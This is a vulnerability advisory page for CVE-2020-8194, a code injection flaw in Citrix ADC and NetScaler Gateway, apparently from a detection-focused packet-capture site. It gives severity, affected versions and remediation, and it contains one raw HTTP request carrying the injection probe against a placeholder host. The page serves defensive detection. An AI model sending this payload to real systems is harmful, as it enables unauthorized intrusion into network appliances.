🔙 목록으로 돌아가기

CVE-2020-8194: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection

TitleCitrix ADC and Citrix NetScaler Gateway - Remote Code Injection
Authordwisiswant0
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationApply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
CVSS Score6.5
EPSS Score0.81139
CVE IDCVE-2020-8194
CWE IDCWE-94
Tags cve cve2020 citrix vkev vuln

🔍 Vulnerability Description

Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download.

🌐 HTTP Request

GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Connection: close
Cookie: startupapp=st
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8194.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-8194.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A